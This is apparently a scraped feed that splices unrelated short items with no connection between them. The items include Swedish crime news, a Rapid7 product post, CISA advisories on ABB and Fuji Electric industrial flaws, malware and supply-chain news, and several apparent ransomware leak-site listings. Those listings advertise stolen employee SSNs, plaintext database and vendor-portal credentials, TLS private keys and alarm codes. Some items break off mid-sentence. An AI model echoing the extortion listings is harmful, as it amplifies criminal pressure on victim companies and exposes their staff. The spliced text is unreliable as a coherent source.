Two children and a woman with no previous convictions have been identified as those who started the fires outside apartments in Råslätt and Liljeholmen in November last year. Thirteen trial days have been set aside at Jönköping District Court, where the trial is now beginning.
A machine operator showed symptoms after a false gas alarm. SSAB chose to pause its measurements temporarily in order to go through the sequence of events together with contractors and the union. "We pause for the slightest thing," says Amelie Winberg at NCC.
Sabeen Malik is VP, Global Government Affairs and Public Policy at Rapid7.
Security teams need a better way to connect what they detect, what they fix, and what they can prove.
The pace of modern security operations no longer works in defenders’ favor. IBM’s Cost of a Data Breach Report 2025 found that the mean time to identify and contain a breach is now 241 days, even as AI and automation help defenders move faster. At the same time, Rapid7’s 2026 Global Threat Landscape Report shows how quickly attacker behavior is compressing the response window: exploited high and critical severity vulnerabilities more than doubled year over year, increasing 105% from 71 in 2024 to 146 in 2025, while the median time from publication to CISA KEV inclusion fell from 8.5 days to 5.0 days. This is not a future risk. It is today’s operational reality.
It also exposes a governance problem most security programs were not built to solve. Security teams are expected to demonstrate, continuously, that controls are working, that risk is being reduced, and that security investments are delivering measurable outcomes. Point-in-time audit evidence, assembled quarterly, is structurally incompatible with an environment where the threat picture changes in minutes.
The underlying issue is not a lack of effort, but a disconnect. Security data lives in one place, remediation happens in another, and evidence for auditors is assembled somewhere else. When leadership asks what changed, what was fixed, and what risk remains, teams are left stitching the story together manually producing reports that reflect where the organization was, not where it is.
Cyber GRC closes that gap by bringing governance, risk management, and compliance closer to the security data and workflows teams already rely on.
Why security operations and compliance need connected data
For years, security operations and GRC have run in parallel. One team manages threats, exposures, and remediation. Another manages policies, controls, audits, and evidence. Both aim to reduce risk, but typically without shared context or shared data.
That separation is no longer sustainable. Vulnerability exploitation rose 34% year-over-year and now accounts for 20% of all breaches, with a median of zero days between critical vulnerability publication and mass exploitation (Verizon DBIR 2025). Supply chain breaches doubled, now representing 30% of all incidents. Ransomware appeared in 44% of breaches – up 37% from the prior year.
Security leaders operating in this environment face an expectation that compliance teams were not designed to meet alone: continuous proof that controls are effective against adversaries who operate at machine speed. When AI agents can autonomously chain every phase of an attack with minimal human oversight, a quarterly audit cycle is not an assurance, but a historical record.
Why Cyber GRC matters now
Boards are no longer satisfied with compliance status reports. They want dollarized risk scenarios and evidence that remediation is actually reducing exposure -- not just that it was attempted.
Two pressures are converging. First, environmental complexity: modern infrastructure spans cloud, SaaS, remote endpoints, OT systems, and third-party providers. The perimeter is everywhere, and so is the attack surface. Second, regulatory expectation: SEC, NIS2, DORA, and CMMC now require demonstrable control effectiveness, not just documented policies. Both pressures demand a model that brings security activity, compliance readiness, and accountability into the same view.
What Cyber GRC changes for security and compliance teams
Cyber GRC changes how organizations use security data. Instead of disconnected, point-in-time artifacts, it enables teams to build governance and compliance workflows directly on top of real security telemetry – so evidence reflects the current state of the environment, not a snapshot assembled weeks before an audit.
In practice, this means connecting findings, controls, remediation activity, and evidence so teams can see what issues exist, who owns the response, how remediation is progressing, and what that means for overall readiness. This also helps address the compliance-theater problem directly: many programs are designed to pass audits rather than reduce actual exposure, creating false confidence and misallocated resources. Grounding compliance evidence in live security telemetry -- rather than manual documentation -- means teams can tell the difference between controls that are configured and controls that are working.
How connected security data strengthens compliance
Compliance has historically been treated as a separate process that happens alongside security operations. In practice, it depends on the same data. The telemetry that surfaces a critical finding also determines whether a control is operating effectively.
When evidence is generated directly from operational systems, teams spend less time assembling reports and more time improving controls. Continuous monitoring for control drift allows organizations to move from reactive audit preparation toward a consistent assurance model. Third-party risk -- now a source of 30% of all breaches -- benefits particularly, since continuous TPRM monitoring surfaces supply chain exposure in real time rather than at the next assessment cycle.
How Rapid7 Cyber GRC builds on existing security workflows
This shift does not require rebuilding security programs from the ground up. With the launch of Rapid7 Cyber GRC, customers can use the security data and workflows already connected through the Command Platform to support audits, assessments, and ongoing control validation. Capabilities such as HITRUST E1 control coverage provide continuous monitoring and automated evidence collection, while features like audit-ready user access exports and unified policy data reduce manual effort across SOC 2, NIST CSF, PAI, and other common frameworks.
When NIST CSF 2.0, MITRE ATT&CK, and FAIR-based risk quantification inform the evidence model rather than just the policy library, compliance becomes a byproduct of strong security operations -- not a parallel burden.
Rapid7 is launching Cyber GRC to connect security operations, risk, and compliance
Organizations do not need more disconnected processes for managing risk. They need a way to connect what they detect, what they fix, and what they can prove in a way that stands up to regulatory scrutiny, board-level oversight -- and keeps pace with adversaries who operate at AI speed.
That is why Rapid7 is launching Cyber GRC: to help customers bring security operations, governance, and compliance into a single, continuous view so teams can reduce risk, improve readiness, and demonstrate progress with confidence.
For current clients, reach out to your account team to get early access to Rapid7's Cyber GRC solution and help shape what comes next.
Sources: IBM Cost of a Data Breach Report 2025 | Rapid7’s 2026 Global Threat Landscape Report | Verizon DBIR 2025
Finland's Eurovision entry has topped all the betting odds lists and expectations are high. Pekka Heino, who commentated on the contest when Finland took its historic victory 20 years ago, hopes history will repeat itself this year. "I will accept nothing other than a Finnish victory. But in Eurovision there is always the risk that if someone is too big a favorite, people vote for something else."
Two years ago a quarrel broke out in Skinnskatteberg between Arne Hjorth and Christine Andersen, then fellow Social Democratic party members. The quarrel ended with a swung bag and a police report. Andersen has now been acquitted of assault.
Kriminalvården's Sagsjön prison in Lindome was locked down on Tuesday afternoon after staff found white powder on the outside of an envelope during a mail inspection. The powder turned out to be cleaning agent.
Think tank warns outsider access to powerful models is governed by patchy controls and a hope nobody dangerous gets in
Manhattan Broadcasting Company is a leading source of local and regional news, sports, weather, and entertainment in Northeast Kansas, engaging over 100,000 listeners weekly. We will upload of corporate data soon. Employee personal informatics, contracts, lots of pictures and other files.
Cybersecurity researchers have flagged a new version of the TrickMo Android banking trojan that uses The Open Network (TON) for command-and-control (C2). The new variant, observed by ThreatFabric between January and February 2026, has been observed actively targeting banking and cryptocurrency wallet users in France, Italy, and Austria. "TrickMo relies on a runtime-loaded APK (dex.module),
Several mysterious cases of illness have halted work on the new electric steel mill at SSAB in Luleå. Municipal commissioner Carina Sammeli (S) takes the situation seriously, but is so far not particularly alarmed. "It probably worries SSAB and its subcontractors more than us," she tells SVT.
In a conference centre in The Hague last October, a roomful of Asia-watching European officials and experts were gathered for a symposium on relations with China when news broke that Beijing was expanding export controls on rare earths and other minerals. Crucially, there was now an extraterritorial element: China could deny exports not only to direct buyers, but also restrict products made in third countries if they contained Chinese-origin rare earth content or controlled inputs. In practice,...
As US President Donald Trump prepares to visit China, Taiwan is again one of the most sensitive issues in US-China relations. For Washington, this is not only a question about the Taiwan Strait. It is a strategic choice that bears on whether the United States can avoid a comprehensive conflict with China, stabilise markets and secure Chinese cooperation on trade, artificial intelligence (AI), Iran and the wider Middle East. This could be the moment when a clear US stance against Taiwan...
A new driver expected to land in the upcoming Linux 7.2 kernel is the ARCTIC Fan Controller driver to allow fan speed monitoring and PWM controls for this upcoming ARCTIC product. Making this new driver all the more exciting is that it was worked on by ARCTIC directly compared to the typical workflow for such desktop/consumer hardware peripherals often being left up to the reverse-engineering, open-source community...
Vision 3 Architects is a collaborative and responsive design studio specializing in architecture and interior design projects. They focus on crafting spaces that reflect each client's vision and values, ensuring a design environment that fosters creativity and collaboration. We will upload 31gb of corporate data soon. Detailed employee personal information (passports, DLs, SSNs and so on), contracts and agreements, client information, projects, NDAs, etc.
It has been described as an execution and called one of the worst crimes in Uppsala in modern times. Now a 21-year-old man has been sentenced to life in prison for the brutal triple murder.
Summary
ABB became aware of a vulnerability in the product versions listed as affected in the advisory. An update is available that resolves the publicly reported vulnerability. An attacker who successfully exploited these vulnerabilities could cause a crash, denial-of-service (DoS), or potentially remote code execution.
The following versions of ABB AC500 V3 Stack Buffer Overflow in Cryptographic Message Syntax are affected: AC500 V3 PM5xxx 3.9.0, 3.9.0_HF1
CVSS: v3 9.8
Vendor: ABB
Equipment: ABB AC500 V3 Stack Buffer Overflow in Cryptographic Message Syntax
Vulnerabilities: Out-of-bounds Write
Background
Critical Infrastructure Sectors: Chemical, Critical Manufacturing, Energy, Water and Wastewater
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Switzerland
Vulnerabilities
CVE-2025-15467
When parsing CMS (Auth)EnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is copied into a fixed-size stack buffer without verifying that its length fits the destination. An attacker can supply a crafted CMS message with an oversized IV, causing a stack-based out-of-bounds write before any authentication or tag verification occurs. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk.
Affected Products: ABB AC500 V3 Stack Buffer Overflow in Cryptographic Message Syntax
Vendor: ABB
Product Version: ABB AC500 V3 PM5xxx Firmware Version 3.9.0
Product Status: fixed, known_affected
Remediations
Vendor fix: The problem is corrected in the following product version: AC500 V3 firmware version 3.9.0 HF1. ABB recommends that customers apply the update at earliest convenience. This firmware version is released for all AC500 V3 PLC types and available for download from the ABB library. https://search.abb.com/library/Download.aspx?DocumentID=3ADR011537&LanguageCode=en&DocumentPartId=&Action=Launch
Mitigation: Refer to section “General security recommendations” for further advice on how to keep your system secure.
Workaround: No workarounds are available
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics
CVSS Version: 3.1
Base Score: 9.8
Base Severity: CRITICAL
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C
Acknowledgments
ABB PSIRT reported this vulnerability to CISA.
Notice
The information in this document is subject to change without notice, and should not be construed as a commitment by ABB. ABB provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall ABB or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if ABB or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from ABB, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners.
Frequently Asked Questions
What causes the vulnerability? Parsing CMS AuthEnvelopedData or EnvelopedData message with maliciously crafted AEAD parameters can trigger a stack buffer overflow.
What is AC500 V3? The AC500 V3 is a scalable range of Programmable Logic Controller (PLC). It provides solutions for small, medium and high-end applications. The AC500 V3 platform offers different performance levels and is the ideal choice for high availability, extreme environments, condition monitoring, motion control or safety solutions. It offers interoperability and compatibility in hardware and software from compact PLCs up to high end and safety PLCs.
What might an attacker use the vulnerability to do? An attacker who successfully exploited these vulnerabilities could cause a crash, denial-of-service (DoS), or potentially remote code execution.
How could an attacker exploit the vulnerability? Refer to section “Vulnerability severity and details”.
Could the vulnerability be exploited remotely? Yes, an attacker who has network access to an affected system node could exploit the vulnerabilities. Recommended practices include that process control systems are physically protected, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed.
When this security advisory was issued, had this vulnerability been publicly disclosed? Yes, the vulnerabilities have been publicly disclosed.
When this security advisory was issued, had ABB received any reports that this vulnerability was being exploited? No, ABB had not received any information indicating that this vulnerability had been exploited when this security advisory was originally issued.
Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).
Recommended Practices
CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices.
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
Advisory Conversion Disclaimer
This ICSA is a verbatim republication of ABB PSIRT 3ADR011536 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory.
Revision History
Initial Release Date: 2026-03-12
2026-03-12, Revision 1: Initial version.
2026-05-12, Revision 2: Initial CISA Republication of ABB PSIRT 3ADR011536 advisory
Summary: Successful exploitation of these vulnerabilities could allow an authenticated attacker to expose sensitive information or cause a CRLF injection. The following versions of Subnet Solutions PowerSYSTEM Center are affected: PowerSYSTEM Center 2020 =5.8.x|=5.11.x|=6.0.x|=5.8.x|=6.0.x|=5.11.x|=6.0.x|
CISA and the Group of Seven (G7) international partners—Germany, Canada, France, Italy, Japan, the United Kingdom, and the European Union—have released joint guidance, Software Bill of Materials for AI – Minimum Elements, to help public and private sector stakeholders improve transparency in their artificial intelligence (AI) systems and supply chains. A software bill of materials (SBOM) acts as an “ingredients list” for software that better positions organizations to understand their supply chains and make risk-informed decisions about how to protect their critical systems. The guidance builds on CISA’s previous work with federal and international partners to establish a shared vision for a software bill of materials and provides recommendations on minimum elements that should be included in an SBOM for AI. Because AI systems are software systems, these recommendations should be considered in addition to the general minimum elements for an SBOM. While not exhaustive or mandatory, the supplemental minimal elements outlined in this guidance reflect the consensus of G7 experts and will expand over time to keep pace with the rapid advancement of AI technology.
Summary: ABB became aware of multiple internally discovered vulnerabilities in the WebPro SNMP card PowerValue for the product versions listed as affected in the advisory. Depending upon the vulnerability, an attacker with access to local network who successfully exploited this vulnerability could have - Unauthorized access - Insufficient Session Expiration leading to resource unavailability - Uncontrolled Resource Consumption leading to DOS attack ABB strongly advises customers to update the latest firmware of affected products. The following versions of ABB WebPro SNMP Card PowerValue Multiple Vulnerabilities are affected: WebPro SNMP Card
Summary: ABB became aware of severe vulnerability in the products versions listed as affected in the advisory. An update is available that resolves these vulnerabilities. An attacker who successfully exploited these vulnerabilities could bypass the user management and read visualization files (CVE-2025-2595), read and write certificates and keys (CVE-2025-41659) or cause a denial-of-service (DoS) (CVE-2025-41691). The following versions of ABB AC500 V3 Multiple Vulnerabilities are affected: AC500 V3
Summary: ABB became aware of severe vulnerability in the products versions listed as affected in the advisory. The Windows gateway is accessible remotely by default. Unauthenticated attackers can therefore search for PLCs, but the user management of the PLCs prevents the actual access to the PLCs – unless it is disabled The following versions of ABB Automation Builder Gateway for Windows are affected: Automation Builder
Summary
Successful exploitation of this vulnerability could allow an attacker to elevate privileges from user to system, which may then enable the attacker to cause a temporary denial of service, open files, or delete files.
The following versions of Fuji Electric Tellus are affected: Tellus 5.0.2
CVSS: v3 7.8
Vendor: Fuji Electric
Equipment: Fuji Electric Tellus
Vulnerabilities: Exposed Dangerous Method or Function
Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Japan
Vulnerabilities
CVE-2026-8108
The installation of Fuji Tellus adds a driver to the kernel which grants all users read and write permissions.
Affected Products: Fuji Electric Tellus
Vendor: Fuji Electric
Product Version: Fuji Electric Tellus: 5.0.2
Product Status: known_affected
Remediations
Vendor fix: Fuji Electric recommends that Tellus be installed only with administrator privileges.
Relevant CWE: CWE-749 Exposed Dangerous Method or Function
Metrics
CVSS Version: 3.1
Base Score: 7.8
Base Severity: HIGH
Vector String: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Acknowledgments
Kim Myung-gyu of Trend Micro Zero Day Initiative reported this vulnerability to CISA
Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).
Recommended Practices
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.
No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely.
Revision History
Initial Release Date: 2026-05-12
2026-05-12, Revision 1: Initial Publication
As part of Dark Reading's 20th anniversary special coverage, we profile the CISOs, founders, researchers, criminals, and policymakers who rewrote the enterprise risk playbook.
Six-minute supply chain blitz pushed 84 malicious versions with credential theft and disk-wiping code
Why do the Riskiest SOC Alerts Go Unanswered? Security operations teams are drowning in alerts. But the real problem isn't always alert volume; it's the blind spots. The most dangerous alerts are the ones no one is investigating. A recent report from The Hacker News examined why certain high-risk alert categories - WAF, DLP, OT/IoT, dark web intelligence, and supply chain signals - consistently
The police made mistakes in the investigation of Katja Nyberg; among other things, an officer accidentally threw the so-called "snorting tube" into a trash can. The former SD member of parliament's lawyer, Martin Orler, is critical: "It is not reassuring that crucial seized evidence has been handled like chewing gum wrappers," he says.
Three dead on the cruise ship MV Hondius, evacuation, isolation, contact tracing: news coverage of the hantavirus is intense. At the same time, rumors, false claims and conspiracy theories are spreading on social media. SVT has taken a closer look at four of them.
Open original transmissionTeamPCP, the threat actor behind the recentsupply chain attack spree, has been linked to the compromise of the npm and PyPI packages from TanStack, UiPath, Mistral AI, OpenSearch, and Guardrails AI as part of a fresh Mini Shai-Hulud campaign. The affected npm packages have been modified to include an obfuscated JavaScript file ("router_init.js") that's designed to profile the execution
Open original transmissionKnapp seger för Alingsås U – 3–2 mot Vartofta Alingsås Tidning
Brett Ratner, director of the documentary Melania and the Rush Hour franchise, is travelling to China as part of US President Donald Trump’s delegation, sources familiar with the filmmaker’s plans have told the South China Morning Post. During the three-day trip, which begins on Wednesday, Ratner intends to advance preparations for the action-comedy franchise’s latest sequel, Rush Hour 4, including meetings with crew members, actors and potential Chinese film distribution partners. He is also...
Mozilla claims the Digital Markets Act delivered lasting bump, invites Britain to do similar
A week ago we reported that the learning platform Canvas had been hacked, which resulted in personal data from 275 million users ending up in the wrong hands. Now Instructure, the company behind Canvas, has announced that it has made a "deal" with the hackers. "While there is never complete certainty when dealing with cybercriminals, we believe it was important to take every step within our power to give customers additional peace of mind, to the extent possible," Instructure writes on its website. In other words, it appears that Instructure chose to pay the demanded ransom, which goes against the general recommendation from police authorities never to give in to this kind of extortion. According to The New York Times, the hacker group Shiny Hunters has promised to delete the stolen data following the agreement and not to use it to extort individual users. Canvas is used by some 30 Swedish universities and university colleges, including the University of Gothenburg, Lund University, Stockholm University, Uppsala University, Chalmers and KTH.
On Monday, OpenAI Deployment Company was launched, a new company that will help organizations implement AI systems. The idea is that OpenAI Deployment Company will send so-called "Forward Deployed Engineers" out to customers, that is, skilled developers who can implement technical solutions based on the customers' own needs. OpenAI Deployment Company is based on Tomoro, a company with 150 employees that OpenAI has got its hands on. Thanks to partners such as TPG, Advent, Bain Capital, Brookfield, Goldman Sachs and Softbank Corp, OpenAI Deployment Company has raised starting capital of 4 billion dollars, which is meant to give the company a good start. Consulting giants such as Bain & Co, Capgemini and McKinsey are also tied to the project. In total, 19 partner companies are involved. Anthropic also recently launched a new company for enterprise services.
Google Threat Intelligence Group (GTIG) warns that hackers are now using AI both to find vulnerabilities and then to create malware to actively exploit the vulnerabilities in question. The discovery was made in connection with a closer analysis of Operation Overload, a campaign run by pro-Russian hackers. "Our analysis of vulnerabilities associated with this campaign identified a zero-day vulnerability implemented in a Python script that makes it possible to bypass two-factor authentication (2FA) for a popular open-source, web-based system administration tool," GTIG writes in a post on the official Google Cloud blog. According to our colleagues at CSO Online, it is not stated which system administration tool is involved, but affected parties are said to have been informed of the incident.
Interior designer Marie Olsson Nylander replaces Anne Lundberg in SVT's "Husdrömmar".
Avanti Windows & Doors — a vinyl window manufacturer headquartered in El Mirage, Arizona, with regional offices across Nevada, Texas, California, and Florida. The exposed material includes: Plaintext SQL Server SA (system administrator) credentials — the master key to the FeneVision ERP database containing every customer order, every price, every financial record the company has ever processed. Employee SSNs, W-4s, I-9s, and E-Verify data — the complete identity package for the entire workforce, from new-hire packets through payroll records spanning 2014–2016+. 1099-MISC/INT forms — SSNs/EINs and payment amounts for 50–200+ contractors and vendors across two tax years. Direct deposit authorizations — bank account and routing numbers for employees who enrolled in ACH payroll. 24+ months of Chase bank statements and 28 months of AMEX corporate card statements — full account numbers, transaction details, and spending patterns. The complete proprietary pricing algorithm — source code for the FastAPI backend that determines window pricing for every builder contract, plus 41+ builder Master Service Agreements with exact pricing terms. CPA-reviewed financial statements, partnership returns, K-1s, and budget forecasts — the company’s full financial anatomy, from cost structure to profit allocation. OSHA 300 logs, workers’ compensation audit files, and UHC health insurance invoices — employee medical and injury data, names of injured workers, treatment details. Attorney-client privileged ADOSH settlement correspondence — OSHA settlement negotiations between outside counsel and the CEO. ~80 Windows roaming profiles — employee desktops, documents, AppData, Outlook .ost/.pst files, browser caches, and cached credentials.
Hundreds of npm packages infected by the self-propagating, credential-stealing worm from TeamPCP are related to the open source TanStack ecosystem.
This is the worst Linux vulnerability in years. TL;DR copy.fail is a Linux kernel local privilege escalation, not a browser or clipboard attack. Disclosed by Theori on 29 April 2026 with a working PoC. It abuses the kernel crypto API (AF_ALG sockets) plus splice() to write four bytes at a time straight into the page cache of a file the attacker does not own. The exploit works unmodified across Ubuntu, RHEL, Debian, SUSE, Amazon Linux, Fedora and most others. No race condition, no per-distro offsets. The file on disk is never modified. AIDE, Tripwire and checksum-based monitoring see nothing. ...
A large scrap heap in Skelleftehamn caught fire on Tuesday. There was heavy smoke at the site and residents were warned.
SpaceX cleared an important milestone Monday on the road to launching a new version of Starship.
Article URL: https://www.cnbc.com/2026/05/12/tiktok-instagram-social-media-addictive-eu-crack-down.html Comments URL: https://news.ycombinator.com/item?id=48106534 Points: 505 # Comments: 455
It looks like you're trying to get more Microsoft 365 users to engage with your assistant. Would you like help?
https://www.reddit.com/r/canvas/comments/1taj9mk/instructure_just_confirmed_they_paid_the_ransom/ "We received assurances that it will not be further shared on the dark web or elsewhere, and we received proof that any copies of that data were deleted. Further, we have been informed that no Instructure customers will be extorted as a result of this incident" Obviously they have no business running a large technology based infrastructure. Inability to secure said infrastructure, then they honestly believe what they just said above. They'll be hit again in the next 6 to 12 months, bookmark this post. submitted by /u/xendr0me
A man in his 20s was killed in connection with a fight in central Kristianstad on Saturday evening. Three of the five suspects were remanded in custody on Tuesday, and the other two who had been arrested were released on Wednesday.
Sunday's Swedish Championship in road racing had to be called off after a tragic accident in which a man died following a collision at Falkenbergs motorbana. A total of three motorcycles were involved in the incident. See how the accident happened with graphics produced by SVT, based on video that captured the sequence of events.
Agentic AI is already running in production environments across many organizations today. It is executing tasks, consuming data, and taking actions — most likely without meaningful involvement from the security team. The industry conversation has largely framed this as a question of policy: allow it, restrict it, or monitor it? However, that framing misses the point. The more urgent
Prominent Linux kernel engineer Peter Zijlstra of Intel has been working on a set of scheduler patches to help with enhancing the behavior and delivering better results, especially for aging hardware he described as a "potato" -- an Intel Sandy Bridge desktop CPU with AMD Radeon RX 580 Polaris graphics. Benchmark results are promising from this work for gaming on old hardware while other workloads may ultimately stand to benefit too...
Customers left staring at restart plea with no keyboard, mouse, or hope
Whether or not Israel should take part in the Eurovision Song Contest has become an increasingly hot potato since the war in Gaza began. When Sweden's artist Felicia commented on Israel, she was contacted by the organizer EBU. Now the head of Eurovision responds on how the contest views the artists' freedom of expression.
Fresh off the milestone of Dell and Lenovo becoming premier sponsors of the Linux Vendor Firmware Service (LVFS), there is a new feature release of the Fwupd firmware updating tool for Linux systems...
For years Intel has been developing the Low Power Mode Daemon "LPMD" to help their hybrid laptop and desktop CPUs deliver optimal power efficiency under Linux. Intel LPMD leverages hardware hints and other features for optimizing active idle power of the processor and putting the system into lower power modes where possible. This tool could soon call the Linux kernel source tree its new home...
US business leaders accompanying President Donald Trump on his state visit to Beijing will be given the opportunity to mingle with their Chinese counterparts at an exclusive international business club, according to sources. On Monday, the White House released a list naming dozens of business chiefs accompanying Trump, including high-profile figures such as Tesla chief executive Elon Musk and Apple’s Tim Cook. Two sources familiar with the arrangement said the Capital Club Beijing had been...
Jiangsu Hengrui Pharmaceutical, China’s largest drug company by market capitalisation, has signed a global collaboration and licensing agreement with US pharmaceutical giant Bristol Myers Squibb (BMS) worth up to US$15.2 billion. Hengrui’s Hong Kong-traded shares climbed 5.3 per cent to HK$69.55 on Tuesday, while its Shenzhen stock rose 4.84 per cent to 56.11 yuan. The deal adds credibility to China’s growing reputation for innovative drug development. Industry players, however, said the country...
The police became suspicious of Katja Nyberg when she "raised her fingers to her nose" in the holding cell. In questioning, the former SD member of parliament says she had been at a "lively party" where she did not keep an eye on her handbag. She is also asked about her time in the rave commission, where she went after party-drug users in the 1990s.
NaRaYa is a famous Thai brand recognized worldwide for its distinctive fabric bags and accessories. Founded in 1989, it has grown into one of Asia's most influential brands, specializing in high-quality, handcrafted products that showcase Thai crafts
Company operates a large-scale sugar mill and refinery in the Saraburi province, producing various types of sugar for both domestic and export markets.
The open-source Haiku operating system inspired by BeOS is now seeing multi-core symmetric multi-processing (SMP) support on ARM64 that works at least in a virtualized world. Plus an assortment of other improvements made to this open-source OS over the course of April...
A man is being charged on suspicion of having stolen more than one million kronor from a sports club in Skellefteå. According to the indictment, the man repeatedly transferred money to his own account. "People in the club started wondering where all the money was going," says prosecutor Peter Jonsson.
Startec Group of Companies, a privately held Calgary-based industrial OEM founded in 1976 by Joe Cawthorn. Startec designs, fabricates, installs, and services compression, process, and refrigeration systems for oil-and-gas operators and the energy-transition sector (RNG, hydrogen, CO2 sequestration, flare-gas capture). The company employs ~270 people and exports ~80% of its cleantech output to US customers including Pembina, ARC Resources, SemCAMS, Cenovus, and Shell. The exposed material spans the entire corporate knowledge base: 25 years of payroll (2001–2026) including a master SIN VERIFICATION.xlsx register, ADP exports, T4/ROE/T2200 forms, banking/EFT direct-deposit data for ~600+ current and former employees; 18+ named passport scans plus a Pakistan resume-and-passport applicant pool (~20+); Wildcard TLS private keys for *.startec.ca (2022–2027 series) and the suspected Active-Directory-integrated internal CA private key; The cyber-insurance policy (BZA2151) and the Nov 2025 Statement of Values & Business-Interruption submission to Zurich; ~25+ named customer engineering libraries (Pembina, ARC, SemCAMS, Cenovus, Shell Scotford) with process specs, as-built drawings, and sizing calculations; Shell Caroline + Shell Saturn dispute-counsel files (~665 MB of privileged litigation material); 12 fiscal years of board packs including “in camera” sessions, the 2020 Valuation Report, family-trust T3 returns, and succession-planning documents; Cawthorn family QuickBooks files (live .QBW — full chart of accounts, general ledger, every transaction); 11 Outlook PST mailboxes (several multi-GB — named ex-employees' complete email history); Physical-security access codes (CCTV passwords, Telsco alarm chart, all-doors key record)
[warehouse] NorthWest Handling Systems — a 55-year-old forklift and warehouse equipment company headquartered in Renton, Washington, with branches across WA, OR, and AK. The dump is the entire corporate file share going back to 1988. 337,000+ files spanning every branch, every department, every era of the company. It includes: Plaintext credit card numbers in an Excel spreadsheet literally titled “C.O.D. info (CREDIT CARD INFO).xlsx” — stored at the root of the file server, unencrypted, for years. Social Security numbers and Taxpayer IDs on W-9 forms and certified payroll documents for government-contract work (USPS, Oregon DHS, public schools). 3+ years of plaintext passwords for Target Corporation’s vendor portal (TARS), stored in Word documents titled “TARGET PASSWORD & SECURITY QUESTIONS.” Each password rotation was saved as a new file. Home Depot Maximo DC billing credentials — plaintext, in a Word document, enabling fraudulent invoicing against a Fortune 50 company. Albertsons/Safeway Corrigo facility-management portal credentials — again, plaintext in a .docx file. 33 GB of customer warehouse CAD files — facility layouts, equipment placement, security-zone dimensions, and fire-protection drawings for approximately 50–200 companies including Nike, Google, Costco, and Umpqua Bank. 24,669 rows of fixed-asset data in ExportFile.csv — the complete equipment inventory, revealing the company’s financial structure, depreciation schedules, and capital-investment history. Corporate bank routing and account numbers (ACH authorization forms), employee direct-deposit details, time cards, disciplinary records, accident reports, and decades of invoices.
After years of stopping dead at the green bubble border, iPhone and Android users can finally send E2EE messages without relying on third-party apps
Flodman reveals: the AHK stars played with foot injuries Alingsås Tidning
The man in his mid-20s who is suspected of 17 cases of sexual molestation was remanded in custody on Tuesday for aggravated breach of domiciliary peace.
Article URL: https://matklad.github.io/2026/05/12/software-architecture.html Comments URL: https://news.ycombinator.com/item?id=48106024 Points: 573 # Comments: 111